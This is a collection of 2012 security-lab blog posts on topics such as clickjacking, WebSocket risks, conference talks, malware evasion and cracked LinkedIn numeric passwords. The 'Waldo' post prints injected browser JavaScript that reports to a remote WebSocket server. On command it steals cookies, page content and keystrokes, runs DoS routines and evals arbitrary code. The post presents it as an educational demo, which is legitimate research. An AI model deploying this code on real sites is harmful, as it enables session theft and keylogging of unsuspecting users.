All Posts in Security Labs


Be Prepared: 4 Steps To Better Data Disaster Planning


Andrew Wild

While more than a month has gone by since the devastating Hurricane Sandy hit the East Coast, the photographs and videos of the incredible destruction will be hard to forget. During a disaster, the priority must be the safeguarding of life, but it is important to also think about safeguarding information. I can’t even begin to imagine how much data (in printed or electronic form) has been damaged by the floods and fires that resulted from this storm. We should all evaluate our own ability to secure critical information technology resources from the threat of another disaster.

Information management policies and procedures are important to ensure the confidentiality of an organization’s information. Proper disaster planning begins with documented information management policies and procedures, including identification, classification, handling and destruction.


Clickjacking: An Overlooked Web Security Hole

Clickjacking is an attack that tricks a web user into clicking a button, a link or a picture, etc. that the web user didn’t intend to click, typically by overlaying the web page with an iframe. This malicious technique can potentially expose confidential information or, less commonly, take control of the user’s computer. For example, on Facebook, a clickjack can lead to an unauthorized user spamming your entire network of friends from your account.

We’ve known about clickjacking, also called “UI redress attacks,” for years now; the technique was originally described in 2008 by Robert Hansen and Jeremiah Grossman. There are countermeasures that web sites can implement to protect against clickjacking attacks, such as framebusters and the X-Frame-Options response header, as well as client-side plug-ins that can be installed in the browser. However, recent studies have shown that web sites may not be taking this vulnerability seriously – or at least they aren’t attempting to protect themselves from clickjacking.
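
As a rough illustration of the header-based countermeasure, the sketch below builds the response header that asks browsers not to render a page inside a frame. The helper name antiFramingHeaders is hypothetical, and the commented-out server is only one assumed way of wiring it in.

```javascript
// Hypothetical helper: returns response headers asking the browser
// not to render this page inside a frame on another site.
function antiFramingHeaders(allowSameOrigin) {
  return {
    // DENY forbids all framing; SAMEORIGIN still allows frames
    // served from the page's own origin.
    "X-Frame-Options": allowSameOrigin ? "SAMEORIGIN" : "DENY",
  };
}

// Assumed usage with Node's built-in http module (not started here):
// const http = require("http");
// http.createServer((req, res) => {
//   res.writeHead(200, antiFramingHeaders(false));
//   res.end("<h1>This page refuses to be framed</h1>");
// });
```

A framebuster script covers older browsers that ignore the header, so sites often combine both.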


National Cyber Security Awareness Month Encourages Americans to STOP. THINK. CONNECT.

October is one of my favorite months of the year. The hot humid days of summer change to cool, crisp days and chilly nights. We have football to watch and beautiful fall foliage to enjoy. October is also the month of the year when everyone, not just information security professionals, reflects upon cyber security because October is National Cyber Security Awareness Month (NCSAM) (http://www.staysafeonline.org/ncsam/).


Hacking Web Apps

In between writing lines of code, I try to twist my fingers into typing more human-friendly output. In this case, it’s a new book on web security called, simply enough, Hacking Web Apps. It explains several web security weaknesses and vulnerabilities, from HTML injection to protecting passwords, to design issues that lead to CSRF, clickjacking and more.

Most well-known web compromises tend to stem from HTML injection (cross-site scripting, or XSS) or SQL injection. After all, those vulns tend to be easy to find and deliver high-impact results like site defacement or stealing millions of passwords. By now, we have tools like sqlmap and BeEF that strip most of the mystery from how these vulns are exploited. Ask someone experienced in web security how easy it is to find XSS and they’ll probably call it child’s play. Check out the OWASP Top 10 and you’ll see XSS detectability rated as easy.

But HTML injection continues to infest sites regardless of their size or sophistication, which seems to imply that its detectability might not be so easy after all. Maybe XSS remains unknown to the huge population of developers building web sites, or maybe the increasing complexity of sites makes security exponentially harder to maintain. Maybe it’s hard to evaluate the tens of millions of sites on the web when there might not even be tens of thousands of people capable of doing it well. At the very least, more education should help.

The book explains how XSS shows up in unexpected places, giving you hints on what to look for in your own site as well as things to consider when coding countermeasures (hint: regular expressions are tough to get right). Even sites with well-informed developers and experienced security teams have this problem.

And those unexpected places? The HTML injection chapter hacked Amazon right from the printed page. A Gutenberg Press Injection attack, if you will.

Then there are hacks like cross-site request forgery (CSRF) and clickjacking that blur the line between tools and manual testing. The search pages for Bing, Google and Yahoo are all, strictly speaking, vulnerable to CSRF. Manual analysis is required to assess the relative risks in such cases and consider whether certain threats are worth addressing. This is the engineering side of security: weighing trade-offs between performance, complexity, threats and risks. Learning about the kinds of design problems that lead to insecure sites helps you avoid them in the future.

Different design problems are covered in the book, as well as the mistakes that happen when good design is betrayed by poor implementation. What if a site lets you apply a discount code multiple times? What if it lets you modify the email recipient for password reset instructions? What if it encourages you to create a long passphrase, but only uses the first eight characters? These sorts of problems are harder, if not impossible, to find with any automated tool. This is why it’s good to stay informed about web security beyond the simple XSS and SQL injection vulns we hear about so often.

And if you’re still unconvinced about the importance of web security, consider this paragraph from the introduction:

On the web information equals money. Credit cards clearly have value to hackers; underground "carder" sites have popped up that deal in stolen cards; complete with forums, user feedback, and seller ratings. Yet our personal information, passwords, email accounts, on-line game accounts, and so forth all have value to the right buyer, let alone the value we personally place in keeping such things private. Consider the murky realms of economic espionage and state-sponsored network attacks that have popular attention and grand claims, but a scarcity of reliable public information. (Not that it matters to web security that "cyberwar" exists or not; on that topic we care more about WarGames and Wintermute for this book.) It’s possible to map just about any scam, cheat, trick, ruse, and other synonyms from real-world conflict between people, companies, and countries to an analogous attack executed on the web. There’s no lack of motivation for trying to gain illicit access to the wealth of information on the web, whether for glory, country, money, or sheer curiosity.

Hacking Web Apps aims to give you a feeling for how hackers exploit web sites along with examples and details about each vuln’s inner workings. Whether you’re developing a web application, or are just curious how hackers take apart web sites, there should be something in there for you.

Would You Let Your Grandma Use WebSockets?

Your grandma has been coding web sites since 1994, and has lately been getting deep into HTML5. But as her web app security advisor, would you recommend she code with WebSockets? Let’s look at the research we did for our talk on Hacking with WebSockets presented at Black Hat USA 2012, and see if we can help grandma out.

As defined in RFC 6455, “the WebSocket Protocol enables two-way communication between a client running untrusted code in a controlled environment to a remote host that has opted-in to communications from that code.” By providing a nice mechanism for low-latency, two-way communication, it removes the need for workarounds such as polling, which simulate persistent connections over the inherently non-persistent HTTP protocol. You can think of WebSockets as a replacement for the “x” in Ajax, but with some additional features. At first glance, it’s just what grandma needs to build out her super fast interactive knitting application.

“Old” Security Still Matters

Web apps that use WebSockets are susceptible to all existing issues that "old" Web apps had. Things like XSS and MITM are still as important as ever. Any attacker that can sniff “http:” can also sniff “ws:”, meaning they can use the same methods to intercept the traffic or inject into the traffic. So WebSockets is just a new way to encounter the same security problems you see with HTTP.

Mixed Content

Although mixing “ws:” with “https:” should be impossible according to RFC 6455, which is a nice improvement, not all browsers adhere to that rule. For now, only Firefox implements this policy. The situation is similar to loading HTTP resources within an HTTPS page: in some cases, the insecure portion of the web application may compromise the whole system.
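
One way to avoid mixed content regardless of browser behavior is to derive the WebSocket scheme from the scheme of the page that opens the connection. The sketch below assumes a hypothetical helper named webSocketUrlFor and a made-up host and path.

```javascript
// Hypothetical helper: pick a WebSocket scheme that matches the
// security level of the page opening the connection.
function webSocketUrlFor(pageProtocol, host, path) {
  // An HTTPS page should only ever talk to an encrypted "wss:" endpoint.
  const scheme = pageProtocol === "https:" ? "wss:" : "ws:";
  return scheme + "//" + host + path;
}

// Assumed browser usage:
// const ws = new WebSocket(
//   webSocketUrlFor(location.protocol, location.host, "/knitting"));
```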

DoS

Another old friend, denial of service (DoS), is also possible with WebSockets. WebSockets typically have a higher connection limit than HTTP, so it’s possible for a malicious web site to exhaust the browser by grabbing the maximum number of WebSocket connections, which could crash your browser. Most major browsers are known to set that limit somewhere between 900 and 3,000; only Firefox limits connections to 200.

It is also possible for a client to DoS a server by requesting a large number of connections from the server. Attacks like SlowLoris strive to maintain persistent connections, thus draining server resources. This happens automatically with WebSockets, which keep the connection alive by design.
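
A server can blunt the connection-exhaustion case by capping how many sockets a single client may hold open. The sketch below is only an illustration of that idea: ConnectionLimiter and its method names are hypothetical, and a real deployment would also need idle timeouts and a sensible notion of "client".

```javascript
// Hypothetical per-client connection cap for a WebSocket server.
class ConnectionLimiter {
  constructor(maxPerClient) {
    this.maxPerClient = maxPerClient;
    this.open = new Map(); // client address -> number of open connections
  }

  // Call before accepting a handshake; returns false when the cap is hit.
  tryAcquire(client) {
    const count = this.open.get(client) || 0;
    if (count >= this.maxPerClient) {
      return false;
    }
    this.open.set(client, count + 1);
    return true;
  }

  // Call when a connection closes so the slot becomes available again.
  release(client) {
    const count = this.open.get(client) || 0;
    if (count <= 1) {
      this.open.delete(client);
    } else {
      this.open.set(client, count - 1);
    }
  }
}
```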

IPS / IDS / DLP and Masking

The WebSocket protocol implements data masking, intended to prevent proxy cache poisoning. While useful, data masking also has a dark side: masking inhibits security tools from identifying patterns in the traffic. Because data loss prevention (DLP) software and firewalls are typically not aware of WebSockets, they can’t do data analysis on WebSocket traffic and therefore can’t identify malware, malicious JavaScript and data leakage in WebSocket traffic.
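
To see why masking defeats naive pattern matching, here is a small sketch of the masking step as RFC 6455 describes it: every payload byte is XORed with one byte of a 4-byte masking key, cycling through the key. The helper name maskPayload and the second key are made up for illustration; the first key and the "Hello" payload follow the example in the RFC.

```javascript
// Sketch of RFC 6455 payload masking. maskPayload is a hypothetical
// helper name, not a browser API.
function maskPayload(payload, maskingKey) {
  const out = new Uint8Array(payload.length);
  for (let i = 0; i < payload.length; i++) {
    // Byte i is XORed with key byte (i mod 4).
    out[i] = payload[i] ^ maskingKey[i % 4];
  }
  return out;
}

const hello = Uint8Array.from([0x48, 0x65, 0x6c, 0x6c, 0x6f]); // "Hello"
const keyA = Uint8Array.from([0x37, 0xfa, 0x21, 0x3d]);
const keyB = Uint8Array.from([0x01, 0x02, 0x03, 0x04]); // arbitrary second key

// The same plaintext looks different on the wire for each key, so a
// byte signature for "Hello" matches neither frame.
const wireA = maskPayload(hello, keyA);
const wireB = maskPayload(hello, keyB);

// Masking is its own inverse: applying the same key again restores the data.
const restored = maskPayload(wireA, keyA);
```

The masking key travels in the frame itself, so a tool that actually parses WebSocket frames can undo the masking; the problem described above is that most security devices do not.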

Malicious users can also bypass security devices by establishing covert channels inside legitimate WebSocket data frames. Reserved flags, length representations and even the mask values can be used to move data to and from the client even when standard protection mechanisms are in place.

For an example of how easy it is to communicate with a compromised browser via WebSockets, see The Tiny Mighty Waldo.

Inspection / Manipulation Tools

To assess WebSocket security by sniffing and manipulating traffic, you need tools. For now there is very limited support for WebSockets on this front. Wireshark, Fiddler and Chrome Developer Tools are some of the first to implement read-only support for WebSocket data frames. ZAP is working on comprehensive support, complete with data frame fuzzing. But until these tools support more sophisticated features, developers don’t have much help creating secure WebSocket applications.

Deployment Recommendations

Since WebSockets is missing security features like HTTP cookies and form-based authentication, secure deployment is going to be a mix of HTTP and WebSockets, or something entirely new.

We are continuing to research the details of the protocol and working out better approaches to implement a robust and secure system using WebSockets, and hope to publish more on this topic. In the meantime, these two simple suggestions will go a long way to keep your grandma safe:

  1. Adopt WebSockets if you need higher throughput, full duplex communication or lower latency.
  2. Remember security basics (authentication/authorization, session management, state handling), as the WebSocket protocol isn’t aware of these.
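
The second suggestion can be sketched as a gate that the application runs before it accepts a WebSocket handshake. Everything here is an assumption made for illustration: the function name authorizeHandshake, the shape of the request object, the origin, and the stand-in token validator.

```javascript
// Hypothetical handshake gate: the protocol itself authenticates no one,
// so the application decides before upgrading the connection.
// `request` is an assumed shape: { origin: string, token: string }.
function authorizeHandshake(request, allowedOrigins, isValidToken) {
  // Reject pages from origins that were never meant to open this socket.
  if (!allowedOrigins.includes(request.origin)) {
    return false;
  }
  // Delegate session validation to the existing application logic.
  return isValidToken(request.token) === true;
}

const allowedOrigins = ["https://knitting.example"]; // made-up origin
const tokenCheck = (token) => token === "session-123"; // stand-in validator
```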

Black Hat & DEF CON 2012 Redux

The week before last we were at Black Hat USA 2012 and DEF CON 20. Besides the Qualys talks at Black Hat (Web Application Firewall, Malware Analysis, WebSockets) and DEF CON (Dwarf Programming), there were a number of great talks at both conferences that the team enjoyed. The following list shows their individual favorites:

  • @DEF CON:  Hacking [Redacted] Routers – FX and Gregg, Recurity Labs
    FX and Gregg dive into the security of (smaller…) Huawei routers and are transported back 15 years in time, as they easily find buffer overflow vulnerabilities, abundant use of “sprintf”, in-house-written implementations of SSH and memory allocation, etc. This, paired with the fact that the researchers failed to find a single security advisory published by Huawei, left the audience with serious doubts about the security of Huawei routers. Huawei has already started to respond to the allegations and it will be interesting to see if the same problems are present in enterprise class Huawei routers. Presentation
    = Favorited by Wolfgang Kandek
  • @BlackHat:  Targeted Intrusion Remediation:  Lessons From The Front Lines – Jim Aldridge
    Jim Aldridge provided an outstanding overview of targeted intrusions including the lifecycle of a targeted attack, remediation planning for targeted attacks,  incident response and strategic planning for targeted intrusions. In addition to the overview of the targeted attack lifecycle, several specific recommendations were provided. Two of my favorite suggestions were to enhance logging/monitoring, and IR team preparation (table top exercises). Presentation and Paper
    = Favorited by Andrew Wild
  • @DEF CON: Defeating PPTP VPNs and WPA2 Enterprise with MS-CHAPv2 – Moxie Marlinspike, David Hulton
    Enterprises reliant on Active Directory with investments in large-scale 802.11 wireless deployments typically leverage 802.1X, PEAP and MS-CHAPv2 as part of their supplicant authentication process. Setting up the basic framework is largely wizard-driven, which makes it easy to implement for Microsoft-centric organizations. However, the common reliance on MS-CHAPv2 as the inner authentication method means that recovering user credentials is now even more practical, due to the predictability inherent in MS-CHAPv2. David Hulton reduced the attack time using dedicated, expensive hardware (FPGAs, etc.), which by itself would make brute-forcing the passwords costly; but with CloudCracker enhanced to leverage that hardware, together with the free chapcrack tool, the attack is now a cheap SaaS solution available to anyone with a captured 802.1X authentication handshake. More info from Moxie Marlinspike on this talk.
    = Favorited by Kimi Ushida
  • @DEF CON: Black Ops – Dan Kaminsky
    Computers and The Internet have problems, and Dan has some solutions he wants us all to try out. He wants us to eliminate timing attacks, create better random numbers, and enable our developers to create safe code on the first try. He also thinks we can route around internet censorship, and he demonstrates a technique to perform simple port scans at unprecedented speeds. All of this and more in a compelling, unified, and entertaining package. Presentation and more info from Dan Kaminsky.
    = Favorited by Lucas Sweany
  • @BlackHat: Find Me in Your Database: An Examination of Index Security – David Litchfield
    David Litchfield discusses ways to attack Oracle Databases via specially crafted indexes, triggers and tables. In some cases, these attacks take advantage of the fact that the bulk of database management itself is built in PL/SQL, which can still be susceptible to SQL injection attacks.
    = Favorited by Matt Wirges
  • @BlackHat: Owning Bad Guys {and Mafia} with JavaScript Botnets – Chema Alonso
    Chema Alonso shows us an excellent demonstration of a MITM attack performed in a very simple manner. While the presentation does not have anything super-technical or novel, it is captivating. Chema created an open proxy that acts as the man in the middle, and it looks like people will trust the proxy. All kinds of traffic, good and bad, legitimate and criminal, was seen in this experiment. The bottom line: do not trust open proxies. He also had a unique, fun way of presenting. Presentation and Paper
    = Favorited by Vaagn Toukharian
  • @BlackHat: Ghost Is in the Air(traffic) – Andrei Costin
    Andrei Costin discusses ADS-B (in)security from a practical angle, presenting the feasibility of attacks as well as techniques that potential attackers could use to play with generated or injected air traffic, potentially opening new attack surfaces onto air traffic control systems. Presentation and Paper
    = Favorited by Sergey Shekyan
  • @BlackHat: Automated Package Clone Detection – Silvio Cesare plus PRNG: Pwning Random Number Generators – George Argyros and Aggelos Kiayias
    These talks from university-level researchers showed real-world applications:
    • Silvio demonstrates how to design an automatic classification engine and lower its false positive rate, applied to detecting code clones: copies of an external library’s code embedded in a project instead of a clean link to that library. The result of his work is the discovery of several previously unknown Debian Linux vulnerabilities, and several Fedora Linux vulnerabilities as well.
    • George Argyros and Aggelos Kiayias focus on PHP randomness vulnerabilities. Using different attacks, ranging from time synchronization with the victim (at millisecond level) to solving linear equations (a state recovery attack), they demonstrate practical exploitation of the password reset mechanisms of popular PHP applications – More Info

    = Favorited by Francois Pesce

  • @BlackHat: Don’t Stand So Close To Me: An Analysis of the NFC Attack Surface – Charlie Miller
    Charlie Miller, famous for his first public remote exploit for the iPhone, demonstrated his research on Near Field Communication (NFC) technology. The talk discussed some of the protocols for NFC and Charlie shared some results he obtained from fuzzing these protocols. Many of the latest phones from Google and Samsung ship with NFC built in, and Charlie demonstrated how he could basically own a phone just by touching it or getting close to it – Presentation and Paper
    = Favorited by Bharat Jogi
  • @BlackHat: Adventures in Bouncerland – By Nicholas Percoco and Sean Schulte
    Nicholas and Sean talk about how they managed to fool Google’s Bouncer system by submitting a completely legitimate app called "SMS Blocker" to Google Play and then slowly modifying the app to include malicious behavior and functionality that had nothing to do with "blocking SMS". The app was updated over 10 times to access data, photographs and the call list, and to turn the phone into a zombie for launching DDoS attacks, yet Bouncer was unable to detect any of the malicious activity. Paper
    = Favorited by Prutha Parikh

The Tiny Mighty Waldo

Waldo is a proof-of-concept educational demo written for Black Hat USA 2012 that shows how easy it is to start using WebSockets, since most major browsers have support for them. We put some security context in it, and demonstrated how easy it is for an attacker to communicate via WebSockets with a compromised browser.

The WebSocket protocol allows users to bypass security devices like firewalls since the majority of them are not aware of it, and therefore do not have knowledge on how to process WebSocket data frames. In a follow-up post, we’ll describe these security implications in more detail.

Waldo Demo

Waldo is small, a C++ program of under 200 lines, and it communicates with a similarly small bit of JavaScript, victim.js, that runs on the compromised browser. It’s a nice demo, but by design it’s not complicated: it was built in a matter of hours.

Waldo is built on top of the websocketpp server, an RFC6455-compliant WebSocket library, and shows how to code with WebSockets on both ends of the pipe: via C++ on the server-side and via the JavaScript API in the browser.

The demo assumes that the victim.js Javascript code, which listens for commands from waldo, has already been injected into a compromised web page.


Waldo Server

The waldo server code is very straightforward and is based on websocketpp's stateless echo_server example. It subclasses a server handler and defines an on_message callback (we implement the text version only; try implementing the binary version yourself), which is called once a complete WebSocket frame is received:

class waldo_server_handler : public endpoint_type::handler {
...
  void on_message(connection_ptr con, websocketpp::message::data_ptr msg) {
    ...
  }
};

Compromised Browser

This demo assumes that Waldo can access a web site that has already been compromised and has had victim.js injected into it. If you also want Waldo to be able to make a browser render screenshots of the compromised web site, then it should also have screenshot.js injected into it.

To make sure the script keeps running even if the user navigates to another page within the same domain, we move the existing content with the malicious script to a hidden frame and reload the page in another frame. This technique won’t work if the server has any kind of anti-framing countermeasure, such as X-Frame-Options or a frame-buster:

if (window.parent && window.parent.document.getElementById('_waldo')) {
  return;
}
//  easy way to reload content into an iframe I found at 
//  http://blog.kotowicz.net/2010/11/xss-track-how-to-quietly-track-whole.html
$('body').children().hide();
$('<iframe id=_waldo>')
  .css({
    position: 'absolute',
    width: '100%',
    height: '100%',
    top: 0,
    left: 0,
    border: 0,
    background: '#fff'
  })
  .attr('src', window.location.href)
  .appendTo('body');

Then the script establishes a WebSocket connection with the waldo server:

if("WebSocket" in window) {
  ws = new WebSocket(url);
}

and either executes predefined functions mapped to the commands received from the server, or evaluates incoming raw JavaScript:

function recv_from_server(e) {
  var incoming = JSON.parse(e.data); 
  console.log("Server: "+incoming.cmd);
  if (incoming.cmd == "screenshot") {
    send(data_scrn);
  }

  else if (incoming.cmd == "cookies") {
    cookie = getCookie();
    send(cookie);
  }
  else if (incoming.cmd == "html") {
    html = getDom();
    send(html);
  }
  else if (incoming.cmd == "activate klogger") {
    if(window.onkeyup == null) {
      ks = '';
      top._waldo.document.onkeyup=klogger;
      send("klogger activated");
    }
  }
  else if (incoming.cmd == "keystrokes") {
    send(ks);
    ks = '';
  }
  else if (incoming.cmd == "de-activate klogger") {
    window.onkeyup=null;
    ks = '';
    send("klogger de-activated");
  }
  else if (incoming.cmd == "crash") {
    crash();
    send("ready (but may already be dead)");
  }
  else if (incoming.cmd == "dos") {
    DoS(incoming.arg1, incoming.arg2);
    send("DoS launched");
  }
  else if (incoming.cmd == "customjs") {
    eval(incoming.arg1);
    send("executed");
  }

  else {
    send("ready");
  }
}

Waldo Dependencies and Installation

Waldo should work on most Linux platforms, as well as on OS X.

There are several dependencies to compile the waldo.cpp file:

websocketpp WebSocket library

– websocketpp requires Boost to successfully compile. Boost version 1.47.0 is recommended.

Boost can be installed either by compiling it from source as described in the tutorial, or through your favorite package installation tool like Brew, MacPorts, APT, etc.

Once Boost is installed, get websocketpp from GitHub and build it:

git clone https://github.com/zaphoyd/websocketpp.git
cd websocketpp
make
make install

After installing the websocketpp library, just download the waldo.zip, extract it, review the common.mk file to make sure you have the correct paths to boost and websocketpp, and type make.

There are advanced tools, like BeEF and XSSChef, that implement very rich functionality around browser exploitation, but we hope that waldo will be helpful for those who want to experiment on their own.

How Malware Employs Anti-Debugging, Anti-Disassembly and Anti-Virtualization Technologies

Last week at Black Hat USA 2012, we published the first results of an ongoing security research project called Dissect || PE in our session titled "A Scientific (but Non-Academic) Study of How Malware Employs Anti-Debugging, Anti-Disassembly and Anti-Virtualization Technologies".

Dissect || PE is founded on a database of 30 million current malware samples and offers both static (i.e. scanning of the malware’s code) and dynamic (i.e. running of the malware under observation) analysis engines.

Static Analysis

The presentation focused on the static analysis side and introduced the results of 51 static tests run against a representative cross-section of 4 million malware samples. The tests were focused on detection evasion attempts by the malware and divided into 4 groups:

  1. Detection of virtual machines, i.e. the malware refuses to run under a VM or changes its behavior to appear non-malicious
  2. Techniques to avoid disassembly, i.e. preventing a security researcher from reverse-engineering a malware sample by looking at its assembly language source code
  3. Methods of preventing debugging
  4. General obfuscation methods, i.e. disrupting the analysis process by calling functions in unorthodox ways

Results

The results clearly showed that close to 90% (88.96%) of the analyzed malware employs at least one of the listed evasion technologies, and that anti-virtualization attempts lead the pack by a wide margin:

[Figure: anti-vm-stats]

For more data on this fascinating world of evasion techniques, please take a look at both the full presentation and detailed technical paper. Sample code for the evasion techniques is available at: http://www.github.com/rrbranco/blackhat2012.

Feedback

The feedback at the conference itself was excellent, but we welcome your opinions on what data you would like us to focus on.

If you are a security researcher, we designed the Dissect || PE analysis engines with you in mind. They are extensible through simple plugin mechanisms, which give you an opportunity to run your detection algorithms against this large sample database and publish the results in the research portal.

Please get in touch with us through comments in this blog post or email at: rbranco *noSPAM* qualys.com.

Android Security Evaluation Framework: ASEF

Have you ever looked at your Android applications and wondered if they are watching you as well?

[Figure: ASEF Architecture]

Whether it’s a bandwidth-hogging app, aggressive adware or even malware, it would be interesting to know if they are doing more than what they are supposed to and if your personal information is exposed. Is there really a way to automatically evaluate all your apps, even hundreds of them, to harvest their behavioral data, analyze their run pattern, and at the same time provide an interface to facilitate a vast majority of evolving security tests with most practical solutions?

To answer these questions, I created the Android Security Evaluation Framework (ASEF) to perform this analysis while alerting you about other possible issues. Use it to become aware of unusual activities of your apps, expose vulnerable components and help narrow down suspicious apps for further manual research.

ASEF Framework

The framework takes a set of apps, either pre-installed on a device or as individual APK files, and migrates them to the test suite, which runs through test cycles on a pre-configured Android Virtual Device (AVD). The technique is to simulate the entire lifecycle of an Android app on an Android device (virtual or physical) and collect data while triggering its behavior. In simple words: download an Android app from the Internet, install it on an Android device, launch it and mess with it (e.g., clicking different buttons, scrolling up and down, swiping). While doing so, collect an activity log using adb (the Android Debug Bridge utility, available as part of the Android SDK) and network traffic using tcpdump (a widely used packet capturing tool).

Behavioral Analysis

This simple yet thorough approach to behavioral analysis produced interesting results about apps leaking sensitive information such as the IMEI, IMSI, SIM card details or phone number of a device. Some malicious apps simply send this data in clear text over the Internet and are much easier to catch by analyzing the collected behavioral data. However, some malicious apps are sophisticated enough to detect the default settings of a virtual Android device and may behave differently in such settings. To overcome this limitation, a virtual device can be custom built by fine-tuning the kernel and altering default settings to emulate a real device, or it can be replaced by a physical Android device.

Open Source

ASEF is now available as open source at http://code.google.com/p/asef/. Users can gain insight into the security aspects of Android apps by running the tool with its default settings. An advanced user can fine-tune it, expand upon the idea by easily integrating more test scenarios, or even find patterns in the data it already collects. ASEF will provide automated application testing and facilitate a plug-and-play kind of environment to keep up with the dynamic field of Android security.

At Black Hat

If you are at Black Hat USA 2012 and/or B-Sides Las Vegas, come to my talk where I discuss the test cycles and results so far. And if not, read the ASEF Getting Started guide for an architectural overview of the framework and more details on the motivations behind the project.

Meanwhile, give ASEF a try and help improve this project with your comments, feedback and contributions.

Discovered Patterns in Numeric Passwords Raise New Questions

In my previous article, I showed how a powerful tool like John The Ripper can crack a few million passwords mainly using a dictionary attack strategy.

As pointed out by Jeremi Gosney on the Security Nirvana blog, it is impossible to write a “Top Passwords” post for the LinkedIn breach because the leaked list only contained unique hashes. That being said, through the analysis of password patterns and the discovery of a few common tendencies, we can see how bad humans are at random password generation by focusing on a group of passwords easily cracked by an incremental attack: numbers.

Numeric Passwords

[Figure: Six Digit Password Heat Map]

Numbers are easy to crack, and out of the 6.5 million passwords exposed in the recent LinkedIn breach, I was able to crack just over 200,000 numeric passwords (i.e., passwords consisting only of the numbers 0 through 9). Of those 200,000 numeric passwords, 93,340 contained 6 digits and 55,027 contained 8 digits – roughly 75% of all numeric passwords found.

Choosing a purely numeric password is usually a horrible idea, because even for 8-digit numeric passwords, it only takes a few seconds to generate the SHA-1 hashes for the 100 million (10^8) possible combinations. By comparison, using a combination of lower-case and upper-case characters plus numbers and 10 special characters yields 7.2 * 10^14 possible combinations (i.e., it takes 7.2 million times longer to generate hashes of all possible combinations). 
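
The arithmetic behind those figures can be checked with a few lines. The sketch assumes the mixed alphabet has 26 + 26 + 10 + 10 = 72 symbols and, as in the comparison above, a password length of 8; the helper name keyspace is made up.

```javascript
// Number of possible passwords for a given alphabet size and length.
// Plain multiplication keeps the result exact for these magnitudes.
function keyspace(alphabetSize, length) {
  let total = 1;
  for (let i = 0; i < length; i++) {
    total *= alphabetSize;
  }
  return total;
}

const numericEight = keyspace(10, 8);              // digits only
const mixedEight = keyspace(26 + 26 + 10 + 10, 8); // lower, upper, digits, 10 specials
const ratio = mixedEight / numericEight;           // how many times larger

console.log(numericEight, mixedEight, ratio);
```

The mixed keyspace comes out at about 7.2 * 10^14, roughly 7.2 million times the numeric one.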

One of the wonderful properties of numbers is how easily they can be represented graphically. As we can’t know which passwords are duplicates, we focused on the distribution of the numerical passwords and chose a method to enhance the patterns.

In the heat map shown above, the 93,340 6-digit passwords that I cracked are represented. The x-axis represents the first two digits from 00 to 99, and the y-axis represents the last four digits from 0000 to 9999.  In other words, each column stands for a single prefix (from the left to the right 00-99) and each row represents a “window” of 100 suffixes (from the bottom 0000-0099 to the top 9900-9999). Thus, each pixel of the graphic represents 100 possible passwords.

For example, the lower left square represents 000000 through 000099; the square to the right of it represents 010000 through 010099; and the top left square represents 009900 through 009999. The color of each square represents the number of cracked passwords within that range, with blue representing very few cracked passwords and red representing many, as shown in the legend below. Note that the color distribution in the heat map is not uniform: color values are shifted based on other values in the same row and column to make the patterns more obvious. Heat maps were generated using R.
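The mapping from a password to its square can be sketched in a few lines. The original heat maps were made in R; the Python below is only an illustration of the binning, and the function names (cell_for, bin_passwords) are hypothetical.

```python
from collections import Counter

def cell_for(password):
    """Return (column, row) of the 100 x 100 grid for a 6-digit numeric password."""
    if len(password) != 6 or not (password.isascii() and password.isdigit()):
        raise ValueError("expected exactly six digits")
    column = int(password[:2])        # first two digits: 00..99
    row = int(password[2:]) // 100    # last four digits, in windows of 100
    return column, row

def bin_passwords(passwords):
    """Count how many passwords fall into each (column, row) square."""
    return Counter(cell_for(p) for p in passwords)

print(cell_for("000099"))  # (0, 0): lower left square
print(cell_for("010000"))  # (1, 0): the square to its right
print(cell_for("009999"))  # (0, 99): top left square
```

Feeding the resulting counts to any plotting library would then give the raw heat map, before the row and column color adjustment mentioned above.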

Heat Map Legend

Patterns Extracted from Numeric Passwords

If users selected their passwords randomly, then the passwords would be distributed evenly with each pixel representing about 9 passwords (93,340 divided by 10,000 squares for our 100 x 100 heatmap). In this case the heatmap would be a uniform color with some “noise.” However, users don’t select passwords randomly, so we can discern areas with higher and lower concentrations of passwords.
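To get a feel for what that “uniform color with some noise” would look like in numbers, here is a small simulation. It is a sketch under the assumption that random users pick each 6-digit value with equal probability; the seed and variable names are arbitrary.

```python
import random
from collections import Counter

TOTAL = 93_340          # cracked 6-digit passwords
CELLS = 100 * 100       # squares in the heat map
expected_per_cell = TOTAL / CELLS   # about 9.3 passwords per square

rng = random.Random(0)  # fixed seed so the run is repeatable
counts = Counter()
for _ in range(TOTAL):
    n = rng.randrange(10**6)                     # uniform 000000..999999
    column, row = n // 10_000, (n % 10_000) // 100
    counts[(column, row)] += 1

observed = [counts.get((c, r), 0) for c in range(100) for r in range(100)]
print(expected_per_cell, min(observed), max(observed))
```

In a uniform world every square stays within a narrow band around 9, so the sharply contrasting areas in the real heat map cannot be explained by chance.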

First, we spot some boxes in the bottom-left corner and two lines, one vertical and one horizontal, which I will discuss later. We also clearly see a diagonal running from bottom left to top right, which represents the passwords composed of three repetitions of the same two digits: 313131, 424242, etc. If we look into the raw data, we can see that all 100 of them are present (and we can guess that some of them are probably used by more than one LinkedIn user). At this point, any attacker can guess that this pattern is used for letters as well (for example, by analyzing the cracked non-numeric passwords, I found 474 of the 676 (26^2) possible lowercase-letter passwords of this form, such as ababab).
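Generating candidates for this repetition pattern is trivial, which is what makes it so useful to an attacker. The following Python sketch (the helper name repeated_candidates is mine) builds both the 100 numeric and the 676 lowercase candidates, and also shows why the numeric ones land on the diagonal: for a password ABABAB, the column is AB and the row is ABAB // 100, which is AB again.

```python
import string
from itertools import product

def repeated_candidates(alphabet, unit_len, repeats):
    """Yield every string made of one unit_len-character unit repeated `repeats` times."""
    for unit in product(alphabet, repeat=unit_len):
        yield "".join(unit) * repeats

digit_candidates = list(repeated_candidates(string.digits, 2, 3))            # 313131, 424242, ...
letter_candidates = list(repeated_candidates(string.ascii_lowercase, 2, 3))  # ababab, ...

# Every numeric candidate has column == row in the 6-digit heat map.
on_diagonal = all(int(p[:2]) == int(p[2:]) // 100 for p in digit_candidates)

print(len(digit_candidates), len(letter_candidates), on_diagonal)
```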

Let’s take a look at the areas and lines in the bottom-left zone of the heat map, adding some color in order to identify them:

Six Digit Password Heat Map with Highlighted Regions

In the green area, we can see all the dates represented as DDMMYY. If we look closer, we can also see that the months (rows) with fewer than 31 days have darker pixels in the 31st column. This also holds true in the diagonally symmetrical red area, which represents MMDDYY. With those two date formats, we can find nearly 40% of the passwords in their corresponding areas, although these cover only 6% of this heat map. The horizontal pink line is composed of numbers ending with a four-digit year of the 20th century (i.e., 19xx), and the vertical pink line represents the numbers beginning with a year from 1955 up to 1998. The yellow area corresponds to dates represented as YYMMDD from 1955 to 1999.
